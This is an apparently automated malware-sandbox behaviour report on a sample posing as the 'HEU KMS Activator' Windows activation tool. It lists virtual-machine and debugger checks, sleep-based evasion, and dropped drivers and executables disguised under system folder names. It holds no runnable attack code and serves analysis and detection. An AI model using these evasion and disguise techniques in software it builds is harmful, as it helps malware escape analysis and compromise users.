Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMemory allocated: 5500000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMemory allocated: ABA0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMemory allocated: C520000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00377050 rdtsc 11_2_00377050
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: GetAdaptersInfo,17_2_00E6C290
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeWindow / User API: foregroundWindowGot 1580Jump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\SetACL.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dllJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\msvcr100.dllJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\kms-client.exeJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exeJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoB6EE.tmp\System.dllJump to dropped file
Source: C:\Windows\System32\drivers\DvLayout.exeDropped PE file which has not been started: C:\Windows\system32\drivers\CbDServices.sys (copy)Jump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\SetACL.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\kms-server.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\SECOPatcher.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Windows\System32\drivers\KMDF_LOOK.sysJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\kms.exeJump to dropped file
Source: C:\Windows\System32\drivers\DvLayout.exeDropped PE file which has not been started: C:\Windows\system32\drivers\mvtnom.sys (copy)Jump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\SECOPatcher.dllJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\cleanospp.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\cleanospp.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\msvcr100.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Windows\System32\drivers\KMDF_Protect.sysJump to dropped file
Source: C:\Windows\System32\drivers\DvLayout.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeAPI coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe TID: 6340Thread sleep time: -55000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6388Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00374A40 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jc 00374D1Fh11_2_00374A40
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00374A40 GetLocalTime followed by cmp: cmp eax, 1fh and CTI: jnbe 00374D44h11_2_00374A40
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E61930 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jc 00E61BD8h17_2_00E61930
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E61930 GetLocalTime followed by cmp: cmp eax, 1fh and CTI: jnbe 00E61C02h17_2_00E61930
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00405F2F FindFirstFileA,FindClose,1_2_00405F2F
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_004064DB DeleteFileA,CloseHandle,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004064DB
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00402C3F FindFirstFileA,1_2_00402C3F
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DFA19 FindFirstFileExW,2_2_006DFA19
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9FA19 FindFirstFileExW,3_2_00C9FA19
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00396627 FindFirstFileExW,11_2_00396627
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ED31AF FindFirstFileExW,17_2_00ED31AF
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,34_2_0040B174
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,34_2_0040B6E9
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E68F90 GetVersionExA,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetSystemMetrics,GetModuleHandleW,GetProcAddress,17_2_00E68F90
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Enterprise without Hyper-V (full installation)
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Microsoft Hyper-V Server
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Datacenter without Hyper-V (full installation)
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe.1.drBinary or memory string: i unknownRtlGetVersionntdll.dllkernel32GetNativeSystemInfokernel32.dllMicrosoft Windows 10Windows Server 2016GetProductInfoBusinessBusiness NHPC EditionServer Hyper Core VHomeHome ChinaHome NHome Single LanguageServer Datacenter (evaluation installation)Server Datacenter, Semi-Annual Channel (core installation)Server Standard, Semi-Annual Channel (core installation)Server DatacenterServer Datacenter (core installation, Windows Server 2008 R2 and earlier)Server Datacenter without Hyper-V (core installation)Server Datacenter without Hyper-V (full installation)EducationEducation NEnterpriseEnterprise EEnterprise EvaluationEnterprise NEnterprise N EvaluationEnterprise 2015 LTSBWindows 10 Enterprise 2015 LTSB EvaluationEnterprise 2015 LTSB NEnterprise 2015 LTSB N EvaluationServer Enterprise (full installation)Server Enterprise (core installation)Server Enterprise without Hyper-V (core installation)Server Enterprise for Itanium-based SystemsServer Enterprise without Hyper-V (full installation)Windows Essential Server Solution AdditionalWindows Essential Server Solution Additional SVCWindows Essential Server Solution ManagementWindows Essential Server Solution Management SVCHome BasicHome Basic NHome PremiumHome Premium NWindows Home Server 2011Windows Storage Server 2008 R2 EssentialsMicrosoft Hyper-V ServerIoT CorePro for WorkstationsPro for Workstations NProPro NWeb Server (full installation)StarterStarter NUltimateUltimate NWeb Server (core installation)Storage Server StandardUnknown Product Windows Vista Windows Server 2008 Windows 7 Windows 8 Windows Server 2008 R2 Windows 8.1 Windows Server 2012 R2 Ultimate EditionProfessionalHome Premium EditionHome Basic EditionEnterprise EditionBusiness EditionStarter EditionCluster Server EditionDatacenter EditionDatacenter Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsSmall Business ServerSmall Business Server Premium EditionStandard EditionStandard Edition (core installation)Web Server EditionWindows Server 2003 R2, Windows Storage Server 2003Windows Home ServerWindows XP Professional x64 EditionWindows Server 2003, Datacenter Edition for Itanium-based SystemsDatacenter x64 EditionEnterprise x64 EditionStandard x64 EditionCompute Cluster EditionWeb EditionWindows XP Home EditionWindows 2000 Datacenter ServerAdvanced ServerServer (build %d), 64-bit, 32-bitROOT\CIMV2SELECT * FROM Win32_OperatingSystemWQLVersion DI
Source: svchost.exe, 00000018.00000002.2508841896.000001BB85882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000018.00000002.2507970571.000001BB8582B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000133C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Enterprise without Hyper-V (core installation)
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000133C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2514178078.000002C2B745B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2510238437.000002C2B1C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2513917571.000002C2B741F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000018.00000002.2508841896.000001BB85864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000018.00000002.2507423273.000001BB85802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: i unknownRtlGetVersionntdll.dllkernel32GetNativeSystemInfokernel32.dllMicrosoft Windows 10Windows Server 2016GetProductInfoBusinessBusiness NHPC EditionServer Hyper Core VHomeHome ChinaHome NHome Single LanguageServer Datacenter (evaluation installation)Server Datacenter, Semi-Annual Channel (core installation)Server Standard, Semi-Annual Channel (core installation)Server DatacenterServer Datacenter (core installation, Windows Server 2008 R2 and earlier)Server Datacenter without Hyper-V (core installation)Server Datacenter without Hyper-V (full installation)EducationEducation NEnterpriseEnterprise EEnterprise EvaluationEnterprise NEnterprise N EvaluationEnterprise 2015 LTSBWindows 10 Enterprise 2015 LTSB EvaluationEnterprise 2015 LTSB NEnterprise 2015 LTSB N EvaluationServer Enterprise (full installation)Server Enterprise (core installation)Server Enterprise without Hyper-V (core installation)Server Enterprise for Itanium-based SystemsServer Enterprise without Hyper-V (full installation)Windows Essential Server Solution AdditionalWindows Essential Server Solution Additional SVCWindows Essential Server Solution ManagementWindows Essential Server Solution Management SVCHome BasicHome Basic NHome PremiumHome Premium NWindows Home Server 2011Windows Storage Server 2008 R2 EssentialsMicrosoft Hyper-V ServerIoT CorePro for WorkstationsPro for Workstations NProPro NWeb Server (full installation)StarterStarter NUltimateUltimate NWeb Server (core installation)Storage Server StandardUnknown Product Windows Vista Windows Server 2008 Windows 7 Windows 8 Windows Server 2008 R2 Windows 8.1 Windows Server 2012 R2 Ultimate EditionProfessionalHome Premium EditionHome Basic EditionEnterprise EditionBusiness EditionStarter EditionCluster Server EditionDatacenter EditionDatacenter Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsSmall Business ServerSmall Business Server Premium EditionStandard EditionStandard Edition (core installation)Web Server EditionWindows Server 2003 R2, Windows Storage Server 2003Windows Home ServerWindows XP Professional x64 EditionWindows Server 2003, Datacenter Edition for Itanium-based SystemsDatacenter x64 EditionEnterprise x64 EditionStandard x64 EditionCompute Cluster EditionWeb EditionWindows XP Home EditionWindows 2000 Datacenter ServerAdvanced ServerServer (build %d), 64-bit, 32-bitROOT\CIMV2SELECT * FROM Win32_OperatingSystemWQLVersion D
Source: svchost.exe, 00000018.00000002.2509181103.000001BB8588E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Datacenter without Hyper-V (core installation)
Source: DvLayout.exe, 0000000B.00000002.1276048496.00000000010CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y*9
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.00000000012DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf4
Source: svchost.exe, 00000018.00000002.2509181103.000001BB8588E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: svchost.exe, 00000024.00000002.2507074491.000001F54682B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00377050 rdtsc 11_2_00377050
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C02AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006C02AC
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeCode function: 4_2_00D65BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_00D65BFC
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00405F56 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405F56
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DD743 mov eax, dword ptr fs:[00000030h]2_2_006DD743
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DD787 mov eax, dword ptr fs:[00000030h]2_2_006DD787
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006D3AC5 mov eax, dword ptr fs:[00000030h]2_2_006D3AC5
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9D787 mov eax, dword ptr fs:[00000030h]3_2_00C9D787
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9D743 mov eax, dword ptr fs:[00000030h]3_2_00C9D743
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C93AC5 mov eax, dword ptr fs:[00000030h]3_2_00C93AC5
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_003905BC mov eax, dword ptr fs:[00000030h]11_2_003905BC
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00383769 mov eax, dword ptr fs:[00000030h]11_2_00383769
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ECD4C1 mov eax, dword ptr fs:[00000030h]17_2_00ECD4C1
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ECD47D mov eax, dword ptr fs:[00000030h]17_2_00ECD47D
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB952E mov eax, dword ptr fs:[00000030h]17_2_00EB952E
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C0D55 VirtualQuery,GetPdbDllFromInstallPath,GetProcAddress,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,2_2_006C0D55
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C02AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006C02AC
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C5308 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006C5308
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006BF56B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_006BF56B
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C802AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C802AC
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C8040E SetUnhandledExceptionFilter,3_2_00C8040E
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C85308 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C85308
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7F56B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C7F56B
